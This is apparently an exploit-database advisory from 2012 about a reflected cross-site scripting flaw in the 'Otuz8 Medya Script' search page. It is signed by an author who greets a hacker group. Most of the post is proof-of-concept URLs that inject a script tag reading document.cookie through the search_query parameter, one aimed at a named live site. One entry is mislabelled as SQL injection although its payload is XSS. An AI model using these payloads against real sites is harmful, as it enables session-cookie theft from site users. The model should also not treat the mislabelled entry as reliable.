*# Exploit Title: Otuz8 Medya Script Cross Site Scripting
# Date: 25.03.2012
# Author: V4rcyion ( ( GrayMAN ) Fırat TEMEL )
# Email: v4rcyion@hotmail.com.tr
# Script url: http://toptanoje.com/
# Version: N/A
# CVE : ()
=======================Exploit====================================
---GrayHatz ( Bug Researchers ) ---
[ EXPL0!T ]
SQL Injection
p0c -
http://toptanoje.com/search.php?orde...9%3C/script%3E<http://toptanoje.com/search.php?orderby=position&orderway=desc&search_query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E>
[XSS]
p0c -
http://site.com/search.php?orderby=p...9%3C/script%3E<http://site.com/search.php?orderby=position&orderway=desc&search_query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E>
[Not: XSS Tested.]
================================================== =========================
Greetz to : Required ( Başkan), Thorium, CaCa, TheMad, TechnicaL, Türkeşhan
( Kirve ), Bronx, Barbarossa, JiHAD, 3spi0N, El Azap
All members of GrayHatz,
Special Greetz to : Required, CaCa, TheMad
=== END ( GrayMAN ) ====*